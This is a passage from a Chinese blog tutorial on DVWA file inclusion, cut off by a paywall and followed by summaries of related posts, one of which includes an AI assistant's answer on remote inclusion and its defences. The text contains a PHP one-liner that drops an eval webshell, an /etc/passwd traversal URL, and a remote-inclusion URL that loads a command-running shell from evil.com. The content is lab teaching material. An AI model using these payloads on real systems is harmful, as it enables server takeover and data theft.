DVWA文件包含漏洞（file inclusion）

最新推荐文章于 2023-01-18 20:21:19 发布

原创

最新推荐文章于 2023-01-18 20:21:19 发布 · 1.3k 阅读

3 ·

CC 4.0 BY-SA版权

文章标签：

#安全

文件包含漏洞是在主机要执行的文件中添加包含木马的文件。

low级别和medium级别分别有远程文件包含（RFI）和本地文件包含（LFI），high级别使用了白名单，无法绕过。

1、low级别

1.1 本地文件包含

在 https://blog.youkuaiyun.com/kirito_pio/article/details/106547336 中，完成了对各个级别的文件上传，但是在执行high级别时只进行了上传，不能使用菜刀，因为图片是静态的文件，不能自己执行，需要等待请求。

图片中包含的一句话脚本如下，可以在执行时新建并写入一个php文件。

 <?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>

对low级别的代码如下，直接对资源进行访问，不设置过滤。


<?php

    $file = $_GET['page']; //The page we wish to display 

?>

先根据 https://blog.youkuaiyun.com/kirito_pio/article/details/106547336 high级别进行图片的上传。

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

kirito_pio

关注关注

2
点赞
踩
3

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

DVWA靶场——File Inclusion

sucker的博客

11-27

2321

例如，常见的file://协议用于读取本地文件，而php://协议则是PHP特有的协议，用于访问PHP内部流或执行某些特定操作。：许多服务器会在 PHP 配置中禁用文件包含功能，或者启用了 open_basedir、safe_mode 等安全设置，限制了包含文件的路径和范围，从而减少了攻击者通过 LFI 漏洞访问系统文件的能力。经过前面的测试知道存在文件包含漏洞，那么还可以测试有无远程文件包含，思路就是通过远程文件包含从攻击者搭建的服务器下载恶意的木马文件，以获取该网站的webshell。

DVWA靶场之四：文件包含漏洞（File Inclusion）

最新发布

YoungLime的博客

10-03

245

一些网站把用户输入直接当作文件路径或文件内容来处理。如果程序没有对用户输入严格限制或验证，就可能把攻击者提供的恶意文件“包含”进来，从而在服务器上下文中执行，进而造成严重后果（例如远程执行代码、部署 web shell、篡改站点等）。File inclusion（文件包含漏洞）侧重的是把文件作为代码在应用上下文中执行或被解析。LFI 与 RFI 是什么LFI（Local File Inclusion，本地文件包含）：程序把目标机器上的本地文件当作要包含/执行的对象。

1 条评论您还未登录，请先登录后发表或查看评论

dvwa之File Inclusion

Alsn86的博客

02-04

867

dvwa之File Inclusion 进行包含的文件名由get方法的page参数传递看一下包含的流程吧 index.php <?php define( 'DVWA_WEB_PAGE_TO_ROOT', '../../' ); require_once DVWA_WEB_PAGE_TO_ROOT . 'dvwa/includes/dvwaPage.inc.php'; dvwaPageStartup( array( 'authenticated', 'phpids' ) ); $page =

DVWA靶场------File Inclusion（文件包含漏洞）

m0_65712192的博客

11-13

1947

DVWA靶场------File Inclusion（文件包含漏洞）

DVWA系列之File Inclusion(文件包含)源码分析及漏洞利用

7Riven's blog

11-27

1477

什么是文件包含？程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，无需再次编写，这种调用文件的过程一般被称为文件包含。 文件包含漏洞的成因随着网站业务的需求，程序开发人员一般希望代码更灵活，所以将被包含的文件设置为变量，用来进行动态调用，但是正是这种灵活性通过动态变量的方式引入需要包含的文件时，用户对这个变量可控而且服务端又没有做合理的校验或者校验被绕过...

DVWA之File Inclusion

Sukiugg的博客

07-28

310

1. url改为： http://192.168.131.148/dvwa/vulnerabilities/fi/?page=/etc/passwd

DVWA之包含漏洞（file Inclusion）——文件包含漏洞产生的原因、文件包含漏洞的利用方式、DVWA之包含漏洞（file Inclusion）

weixin_45116657的博客

09-10

3234

hahaha

DVWA靶场——File Inclusion(文件包含漏洞)

qq_74806534的博客

01-18

8895

程序开发人员通常会把可重复使用的函数写到单个文件中，在使用某些函数时，直接调用此文件，无需再次编写，这种调用文件的过程一般被称为文件包含。File Inclusion，文件包含（漏洞），是指当服务器开启allow_url_include选项时，就可以通过php的某些特性函数（include()，require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。

DVWA——文件包含漏洞（File Inclusion）

qq_45927819的博客

10-18

1419

前言：之前总结了文件上传漏洞的三个等级的测试，到high的时候我们制作的一句话木马图片需要去解析，就会用到文件包含漏洞，那么今天就来学习一下文件包含漏洞和DVWA——File Inclusion测试吧！什么是文件包含漏洞？ 文件包含概述和SQL注入等攻击方式一样，文件包含漏洞也是一种“注入型漏洞”，其本质就是输入一段用户能够控制的脚本或者代码，并让服务器端执行。什么叫包含呢？以PHP为例，我们常常把可重复使用的函数写入到单个文件中，在使用该函数时，直接调用此文件，而无需再次编写函数，这一过程就叫做

DVWA—文件包含漏洞（File Inclusion）

qq_54537919的博客

06-27

1288

DVWA—文件包含漏洞（File Inclusion）

DVWA-File Inclusion

weixin_44866139的博客

02-07

345

文件包含是指应用程序加载的文件（本地/远程）可以由用户提交的数据控制，从而导致攻击者控制恶意文件在服务器上执行. 对于php来说，常见的文件包含函数有如下： require:找不到被包含的文件，报错，并且停止运行脚本。 include:找不到被包含的文件,只会报错，但会继续运行脚本。 require_once:与require类似,区别在于当重复调用同一文件时,程序只调用一次。 include_...

DVWA V1.9：File Inclusion（文件包含）

qq_43233085的博客

01-24

625

DVWA V1.9：File Inclusion（文件包含）File Inclusion 介绍Low 级别核心代码官方提示漏洞利用Medium 级别核心代码官方提示漏洞利用High 级别核心代码官方提示漏洞利用Impossible 级别核心代码官方提示 File Inclusion 介绍一些Web应用程序允许用户指定直接用于文件流的输入，或者允许用户将文件上载到服务器。在稍后的时间，Web应用...

DVWA靶场文件包含（low）

qq_14902381的博客

08-15

1064

dvwa靶场文件包含漏洞

DVWA之File Inclusion（文件包含）

weixin_41182861的博客

06-04

318

前言

DVWA 之 File Inclusion（文件包含）

RexHa的博客

10-01

1427

dvwa 文本包含漏洞的解析

DVWA靶场系列（三）—— File Inclusion（文件包含）

qq_45612828的博客

07-12

1311

DVWA靶场系列（三）—— File Inclusion（文件包含）

DVWA-File Inclusion（文件包含）

Cwillchris的博客

10-28

2638

实验环境： DVWA靶机：172.16.12.10 windos攻击机：172.16.12.7 kali攻击机：172.16.12.30 实验步骤： FileInclusion，意思是文件包含（漏洞），是指当服务器开启 allow_url_include选项时，就可以通过php的某些特性函数（include()， require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。.

4、DVWA:file include (文件包含漏洞)

qq_44598397的博客

09-25

1240

4、file include (文件包含漏洞) File Inclusion，意思是文件包含（漏洞），是指当服务器开启allow_url_include选项时，就可以通过php的某些特性函数（include()，require()和include_once()，require_once()）利用url去动态包含文件，此时如果没有对文件来源进行严格审查，就会导致任意文件读取或者任意命令执行。文件包...

DVWA-文件包含漏洞

weixin_51706044的博客

05-16

1975

文章目录原理以及介绍一、文件包含二、环境配置三、LOW级别查看源码本地文件包含远程文件包含 原理以及介绍在通过PHP的相应函数（比如include()）引入文件时，由于传入的文件名没有经过合理的校验，从而操作了预想之外的文件，就可能导致意外的文件泄露甚至恶意的代码注入。 文件包含漏洞的形成，需要满足两个条件： include()等函数通过动态变量的方式引入需要包含的文件用户能够控制这个动态变量在文件包含漏洞中，进行文件包含时PHP 伪协议的掌握是必不可少的这里不一一说明，留下大佬的博客可以去借阅学

DVWA靶场文件包含漏洞(File Inclusion)远程文件

04-03

<think>好的，我现在需要处理用户关于DVWA靶场中文件包含漏洞的远程利用和防御方法的问题。首先，我需要回忆文件包含漏洞的基本知识，特别是远程文件包含（RFI）的部分。根据用户提供的引用资料，特别是引用[3]和[4]，远程文件包含需要allow_url_include配置开启，而DVWA的高级别可能已经关闭了这个选项。接下来，用户想知道远程利用的方法。根据引用[4]，当allow_url_include开启时，攻击者可以通过包含远程服务器上的恶意文件来执行代码。例如，使用http://或ftp://协议引入外部脚本。但需要注意，在DVWA的高级别设置中，可能已经对文件路径做了限制，比如必须以file://开头，如引用[5]提到的，这时候可能需要使用file://伪协议，但这是本地包含而非远程。然后，关于防御方法，引用[1]提到使用绝对路径和避免动态包含，引用[2]和[3]讨论了白名单验证和关闭危险配置。需要综合这些信息，给出具体的修复建议，如输入验证、禁用远程包含等。在生成相关问题的时候，要涵盖漏洞原理、利用条件、防御措施以及与其他漏洞的区别，确保问题全面。同时要检查引用标注是否正确，每个引用对应的内容是否准确。例如，引用[5]提到High级别使用file://开头，这可能影响远程包含的可能性，需要指出远程包含的条件是否满足。最后，确保回答结构清晰，分点说明利用方式和防御方法，并正确引用相关来源。同时，验证LaTeX格式是否正确，但根据用户的问题，可能不需要数学公式，但如果有涉及变量或路径的地方，要使用$...$格式。例如，路径参数可以写成$_GET['page']$这样的形式。总结步骤：1. 解释远程利用的条件和方法，引用相关材料；2. 列出防御措施，结合多个引用中的建议；3. 生成相关问题，覆盖漏洞的各个方面。</think>### DVWA 文件包含漏洞（File Inclusion）远程利用及防御方法 #### 一、远程文件包含（RFI）利用方式 1. **利用条件** - PHP配置中需开启 `allow_url_include=On`（默认关闭，需手动修改`php.ini`）[^4]。 - 目标代码中存在动态包含用户可控参数的漏洞，例如 `include($_GET['page']);`。 2. **攻击步骤** - **构造恶意文件**：在远程服务器（如攻击者控制的站点）存放包含恶意代码的文件，例如 `http://evil.com/shell.txt`，内容为 `<?php system($_GET['cmd']);?>`。 - **触发包含**：通过URL参数注入远程文件路径，例如： ``` http://dvwa/vulnerabilities/fi/?page=http://evil.com/shell.txt&cmd=id ``` 若配置允许远程包含，服务器会加载并执行远程文件中的代码，实现命令注入[^4]。 3. **绕过限制** - 若High级别限制路径以`file://`开头（如DVWA的High级别），可通过伪协议`file://`结合路径遍历尝试本地文件包含（LFI），例如： ``` page=file:///var/www/html/config.php ``` 但此方式属于本地包含，非严格意义的远程利用[^5]。 --- #### 二、防御方法 1. **输入验证与白名单** - 对用户输入的包含路径进行严格校验，仅允许预定义的合法文件名（如`home.php`、`about.php`），拒绝包含外部路径或协议[^2][^1]。 2. **禁用危险配置** - 关闭PHP的远程文件包含功能：在`php.ini`中设置 `allow_url_include=Off` 和 `allow_url_fopen=Off`[^4]。 3. **使用绝对路径** - 避免动态拼接路径，改用硬编码的绝对路径，例如： ```php $allowed_pages = ['home' => '/var/www/html/home.php']; if (isset($_GET['page']) && array_key_exists($_GET['page'], $allowed_pages)) { include($allowed_pages[$_GET['page']]); } ``` 此方法彻底消除路径遍历风险。 4. **文件后缀限制** - 强制添加固定后缀（如`.php`），防止包含非预期文件类型： ```php $page = $_GET['page'] . '.php'; ``` 5. **代码隔离** - 将可包含文件存放在Web根目录外，避免通过URL直接访问敏感文件[^3]。 ---